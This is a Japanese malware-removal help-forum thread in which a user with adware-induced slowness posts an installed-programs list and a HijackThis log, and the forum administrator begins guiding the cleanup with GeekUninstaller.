悪代官の伏魔殿掲示板
パソコン動作緩慢・広告類がひどい
広告がひどく、パソコンの動作が異常に遅いです。どうにかしたいのですが、どのような情報を送ったらよろしいでしょうか?
とりあえずHJTをDLしたらよろしいでしょうか?
  • T・T
  • 2015/04/27 (Mon) 16:16:55
準備作業の案内です
こんばんは。
ここの管理人の悪代官です。
まずは案内します。

できるだけPC内を詳しく解析しないと、処置できるものもできませんから、解析用のログをとってください。
下記の2ページの説明を熟読して、その規約に外れるものがなければ2つのログを返信に貼り付けてレスで見せてください。
そこから順番に調べていきましょう
http://akumaden.web.fc2.com/prepare.html

http://akumaden.web.fc2.com/index.html
  • 悪代官
  • 2015/04/27 (Mon) 18:36:02
Re: パソコン動作緩慢・広告類がひどい
CCのログ
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/03/09 6.00 MB 16.0.0.305
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver Atheros Communications Inc. 2012/04/24 1.0.0.36
Bandisoft MPEG-1 Decoder 2012/11/10
BookPlaceReader Toshiba Book Place 2012/04/24 79.8 MB 1.6.80
Browsers Apps browser 2014/08/11 1.34.7.29
BUFFALO AirStation倍速設定ツール(アンインストール) 2014/05/19
BUFFALO クライアントマネージャV をアンインストール BUFFALO INC. 2014/05/19 9.87 MB 1.4.10
CCleaner Piriform 2015/04/27 5.05
Conexant HD Audio Conexant 2012/04/24 8.51.1.0
Corel Digital Studio SE Corel Corporation 2012/04/24 1.79 GB 1.5.10.433
deal2dealit "" 2014/11/14
Epson Download Navigator SEIKO EPSON CORPORATION 2012/05/05 705 KB 1.0.1
Epson E-Photo SEIKO EPSON CORPORATION 2012/05/05 1.3.0.0
Epson E-Photo Plug-in for PMB(Picture Motion Browser) SEIKO EPSON CORPORATION 2012/05/05 1.00.0000
Epson E-Web Print SEIKO EPSON CORPORATION 2012/05/05 11.7 MB 1.09.0000
Epson Event Manager SEIKO EPSON CORPORATION 2012/05/05 40.5 MB 2.50.0000
EPSON PX-404A プリンター アンインストール SEIKO EPSON Corporation 2012/05/05
EPSON PX-404A ユーザーズガイド 2012/05/06
EPSON Scan Seiko Epson Corporation 2012/05/05
EPSON Scan OCR コンポーネント SEIKO EPSON Corp. 2012/05/05 1.20.0000
Foxtab FoxTab 2011/11/22
Google Chrome Google Inc. 2015/03/21 42.0.2311.90
i-フィルター 6.0 デジタルアーツ株式会社 2011/11/22 20.3 MB 6.00.15.0043
Intel(R) Management Engine Components Intel Corporation 2012/04/24 7.0.0.1144
Intel(R) Processor Graphics Intel Corporation 2012/04/24 8.15.10.2509
Intel(R) Rapid Storage Technology Intel Corporation 2015/04/27 10.1.2.1004
Intel(R) WiDi Intel Corporation 2012/04/24 139 MB 2.1.42.0
IObit Uninstaller IObit 2014/10/15 4.0.4.1
LAPLINK ヘルプデスク クライアント Intercom, Inc. 2012/04/24 1.22
LoiLoScope 2 LoiLo inc 2011/11/22 181 MB 2.0.3.1
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/03/06 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/15 38.8 MB 4.5.51209
Microsoft Office 2010 Microsoft Corporation 2013/11/12 14.0.7015.1000
Microsoft Office ナビ 2010 Microsoft Corporation 2013/11/12 17.3 MB 14.0.7015.1000
Microsoft Primary Interoperability Assemblies 2005 Microsoft Corporation 2011/11/22 7.75 MB 9.0.21022
Microsoft Silverlight Microsoft Corporation 2014/07/24 249 MB 5.1.30514.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2011/11/22 1.69 MB 3.1.0000
Microsoft SQL Server Compact 3.5 SP2 ENU Microsoft Corporation 2012/04/24 3.39 MB 3.5.8080.0
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/04/24 300 KB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2011/11/22 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2012/05/04 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/04/24 230 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2011/11/22 596 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2011/11/22 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2012/05/04 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 15.0 MB 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Corporation 2014/10/16 10.0.50903
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語 Microsoft Corporation 2014/10/16 10.0.50903
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/09/29 8.03 MB 4.0.20823.0
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 2014/11/16 1.27 MB 4.20.9870.0
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 2014/11/16 1.33 MB 4.20.9876.0
MyEPSON Connect SEIKO EPSON Corporation 2012/05/05
NewPlayer 2014/10/28 30.7 MB v2.1.2.8
NTT西日本 リモートサポートツール 西日本電信電話株式会社 2012/06/23
PCあんしん点検ユーティリティ TOSHIBA Corporation 2012/04/24 2.82 MB 1.1.3.0
PC引越ナビ 東芝情報機器株式会社 2011/11/22 12.7 MB 4.1.3
PennyBeeUpdate PennyBeeUpdate 2014/10/07
PepperZip 1.0 PepperWare Co. 2014/08/11 1.0
PhotoWizard Microsoft 2012/04/24 387 MB 1.0.0
PlayReady PC Runtime amd64 Microsoft Corporation 2011/11/22 2.05 MB 1.3.0
Realtek USB 2.0 Reader Driver Realtek Semiconductor Corp. 2012/04/24 1.0.0.7
Remote Desktop Access (VuuPC) CMI Limited 2014/08/11 1.0.0.0
Renesas Electronics USB 3.0 Host Controller Driver Renesas Electronics Corporation 2012/04/24 276 KB 2.0.34.1
RZプレーヤー CyberLink Corp. 2012/04/24 1.5.9508
SalesMagnet "" 2014/11/19
SaverAddon SaverAddon 2014/11/15
Search Protect Client Connect LTD 2014/08/26 2.16.31.75
Sempre Griot Co.,Ltd. 2011/11/22 5.18 MB 1.2.0
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101
Steam Valve Corporation 2014/09/29 2.10.91.91
Terraria Re-Logic 2014/09/29
TOSHIBA Bulletin Board TOSHIBA Corporation 2012/04/24 2.1.17.64
TOSHIBA ConfigFree TOSHIBA CORPORATION 2012/04/24 85.7 MB 8.0.42
TOSHIBA Disc Creator TOSHIBA Corporation 2012/04/24 11.0 MB 2.1.0.11 for x64
TOSHIBA ecoユーティリティ TOSHIBA Corporation 2012/04/24 18.8 MB 1.3.8.64
TOSHIBA Face Recognition TOSHIBA Corporation 2012/04/24 3.1.18.64
TOSHIBA Hardware Setup TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Manual TOSHIBA CORPORATION 2012/04/24 35.0 MB 0094.6404.2402
TOSHIBA Media Controller TOSHIBA CORPORATION 2012/04/24 1.0.87.4
TOSHIBA Media Controller Plug-in TOSHIBA CORPORATION 2012/04/24 6.65 MB 1.0.7.7
TOSHIBA PalaDouga TOSHIBA CORPORATION 2011/11/22 767 MB 2012.0101.0001
TOSHIBA PC Health Monitor TOSHIBA Corporation 2012/04/24 28.9 MB 1.7.11.64
TOSHIBA Peak Shift Control TOSHIBA Corporation 2012/04/24 3.00.05.64
TOSHIBA Recovery Media Creator TOSHIBA CORPORATION 2011/11/22 2.1.5.5109a
TOSHIBA ReelTime TOSHIBA Corporation 2012/04/24 1.7.21.64
TOSHIBA Resolution+ Plug-in for Windows Media Player TOSHIBA Corporation 2012/04/24 1.1.2003
TOSHIBA SD-Video PLAYER TOSHIBA Corporation 2012/04/24 1.00.2.21-B
TOSHIBA Service Station TOSHIBA 2012/04/24 2.2.13
TOSHIBA Sleep Utility TOSHIBA Corporation 2012/04/24 1.4.2.9
TOSHIBA Speech Synthesis TOSHIBA CORPORATION 2012/04/24 65.0 MB 1.5.0.1
TOSHIBA Supervisor Password TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Sync Utility TOSHIBA Corporation 2011/11/22 2.0.3090
TOSHIBA Value Added Package TOSHIBA Corporation 2012/04/24 131 MB 1.6.16.64
TOSHIBA VIDEO PLAYER TOSHIBA Corporation 2012/04/24 45.9 MB 5.0.0.4-B
TOSHIBA Web Camera Application TOSHIBA Corporation 2012/04/24 65.2 MB 2.0.3.29
TOSHIBA Wireless Display Monitor TOSHIBA CORPORATION 2012/04/24 1.68 MB 1.0.1
TOSHIBA Wireless LAN Indicator TOSHIBA CORPORATION 2012/04/24 5.06 MB 1.0.5
TOSHIBA 無線LANらくらく設定 TOSHIBA CORPORATION 2011/11/22 18.2 MB 2.0.10.0628.1115n
UltraCoupon UltraCoupon 2014/02/22
Windows Live Essentials Microsoft Corporation 2011/11/22 15.4.3502.0922
Yahoo! Search Pay-By-Ads 2014/11/23
いつもNAVI PC ZENRIN 2011/11/22 6.1.2
おたすけナビ 東芝情報機器株式会社 2011/11/22 20.9 MB 6.1.3
おまかせフォトムービー TOSHIBA CORPORATION 2012/04/24 139 MB 1.1.2000.1
てぶらナビ TOSHIBA CORPORATION 2012/04/24 22.8 MB 1.5.1.5
インテル(R) PROSet/Wireless WiFi ソフトウェア Intel Corporation 2012/04/24 130 MB 14.01.1000
スタートアップツール 西日本電信電話株式会社 2012/06/23 2.60 MB 6.0
セキュリティ対策ツール 西日本電信電話株式会社 2014/04/21 450 MB 6.11
セキュリティ申込・設定ツール 西日本電信電話株式会社 2014/04/21 3.57 MB 6.0.0.7
レグザリンク・ダビング TOSHIBA CORPORATION 2012/04/24 1.0.11.1-A
動画で解決!操作ガイド 東芝情報機器株式会社 2011/11/22 15.9 MB 2.1.3
動画で解決!操作ガイド-コンテンツ- 東芝情報機器株式会社 2011/11/22 148 KB 2.1.3
東芝HDD/SSDアラータ TOSHIBA Corporation 2012/04/24 55.0 MB 3.1.64.9
東芝ピークシフトコントロール TOSHIBA Corporation 2012/04/24 3.00.05.64
東芝プレイス ダイジェストワード TOSHIBA CORPORATION 2012/12/16 7.40 MB 1.0.1
東芝プレイスガジェット TOSHIBA CORPORATION 2012/04/24 2.81 MB 3.0.3
東芝プレイスガジェット用ライブラリ TOSHIBA CORPORATION 2011/11/22 997 KB 2.0.0
筆ぐるめ Ver.19 富士ソフト株式会社 2011/11/22 587 MB 19.00.0000
診断復旧ツール 西日本電信電話株式会社 2014/05/07 12.5 MB


HJTのログ
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 18:55:41, on 2015/04/27
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)


Boot mode: Normal

Running processes:
C:\Program Files\NTTW\SECURITY\SEC\plugin\TMAS\TMAS_WLM\TMAS_WLMMon.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
C:\Program Files (x86)\EPSON\MyEPSON Connect\mep.exe
C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhrcusr.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\chromeextension\NativeMessageHost\ToolbarNativeMsgHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Trend Micro NSC BHO - {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - C:\Program Files\NTTW\Security\AMSP\Module\20004\2.5.1331\6.8.1094\TmIEPlg32.dll
O2 - BHO: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O2 - BHO: CTPBIEAddonBHO - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\TmBpIe32.dll
O2 - BHO: ifp6toolbar - {BE920B15-1DCA-450e-87D0-C1EEA491F3DD} - C:\Program Files (x86)\Digital Arts\IFP6\app\bin\ifp6toolbar32.dll
O2 - BHO: TOSHIBA Media Controller Plug-in - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
O3 - Toolbar: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O3 - Toolbar: セキュリティツールバー - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [TSUScheduler] %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
O4 - HKLM\..\Run: [LLHDUSER] "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
O4 - HKLM\..\Run: [TSleepSrv] %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [TouchFree] C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
O4 - HKLM\..\Run: [ToshibaPlacesGadget] "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
O4 - HKLM\..\Run: [IME14 JPN Setup] C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
O4 - HKLM\..\Run: [EEventManager] "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
O4 - HKLM\..\Run: [NTTW_OSA_AUS] "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
O4 - HKCU\..\Run: [EPLTarget\P0000000000000000] C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - Global Startup: クライアントマネージャV.lnk = C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: OneNote に送る(&N) - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - res://C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll/1000
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: OneNote に送る - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: OneNote に送る(&N) - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: 故障かな?と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
O9 - Extra button: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://dynabook.fresheye.com (HKLM)
O15 - Trusted Zone: http://www.ig.gmodules.com (HKLM)
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {53F4962A-8E27-4601-8B01-79A82B4D7FC9} (LoadPrg Class) - https://member.gungho.jp/front/member/webgs/LoadPrgAx.CAB
O17 - HKLM\System\CCS\Services\Tcpip\..\{9833B785-AB5F-4839-BF2F-DA06DA750E09}: NameServer = 218.176.253.97 218.176.253.65
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\TmBpIe32.dll
O18 - Protocol: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\NTTW\Security\AMSP\Module\20004\2.5.1331\6.8.1094\TmIEPlg32.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\Security\SEC\UIFramework\ProToolbarIMRatingActiveX.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - AppInit_DLLs: c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: Security Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\NTTW\Security\AMSP\coreServiceShell.exe
O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)
O23 - Service: BWH32S - BUFFALO INC. - C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
O23 - Service: ConfigFree WiMAX Service (cfWiMAXService) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe
O23 - Service: CLHNService - Unknown owner - C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe
O23 - Service: ConfigFree プロファイルサービス (ConfigFree Service) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: EPSON V3 Service4(04) (EPSON_PM_RPCV4_04) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Program Files\Intel\WiFi\bin\EvtEng.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: LLHDClient - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDClient.exe
O23 - Service: LLHDCloader - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDCldr.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: MyEPSON Connect Service - SEIKO EPSON CORPORATION - C:\Program Files (x86)\EPSON\MyEPSON Connect\mepService.exe
O23 - Service: Wireless PAN DHCP Server (MyWiFiDHCPDNS) - Unknown owner - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
O23 - Service: NewVideoPlayer Updater Service (NewVideoPlayerUpdaterService) - Unknown owner - C:\Program Files (x86)\NewPlayer\NewVideoPlayerUpdaterService.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\windows\system32\GameMon.des.exe (file missing)
O23 - Service: Toshiba Places Digestword (PBExtractService) - TOSHIBA CORPORATION - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\PBExtractService.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
O23 - Service: TOSHIBA eco Utility Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TECO\TecoService.exe
O23 - Service: TOSHIBA HDD SSD Alert Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
O23 - Service: TOSHIBA TosRzTf Control Service (TosRzTfSvc) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
O23 - Service: TPCHKarteSVC - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
O23 - Service: TPCH Service (TPCHSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
O23 - Service: UDSS - Unknown owner - c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: Update Hold Page - Intel Corporation - (no file)
O23 - Service: Util Hold Page - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 15514 bytes

  • T・T
  • 2015/04/27 (Mon) 19:06:32
やはり問題多数。腰を据えて作業を
早速の作業と報告、ご苦労様です。
解析ログを見せていただきました。
おかげでだいぶ状況が見えてきました。
はっきり言ってかなりの複合感染ですね。
全部片付くまでにはそれなりの手間は避けられないので、時間はかかってもいいですから落ち着いてひとつずつ確実に進めてください。

まず最初にお伝えしておきます。
見てのとおり現在相談者さん多数のため、相談受けてから皆さんに順番にレスできるまで、毎回1日かそれ以上かかる可能性もあるので、すみませんがご了承ください。

では以下の説明をよく見てから、順番に作業をお願いします。
既に準備した物もあるはずですが、一応説明を再度見ておいてください。

隠しファイルと拡張子を表示設定にしてください(やり方↓)
http://pasofaq.jp/windows/mycomputer/hiddenfile.htm
http://support.microsoft.com/kb/978449/ja

下記のツールをダウンロードして、基本の使い方を把握しておいてください。
ただし、配布サイトで他のアプリをダウンロードしろと勧めてくるような広告も出てきたらそれらは絶対にクリックしないでください。
「GeekUninstaller」(通称:GU)
説明ページ↓
http://www.gigafree.net/system/install/geekuninstaller.html
ダウンロード↓
http://www.geekuninstaller.com/download
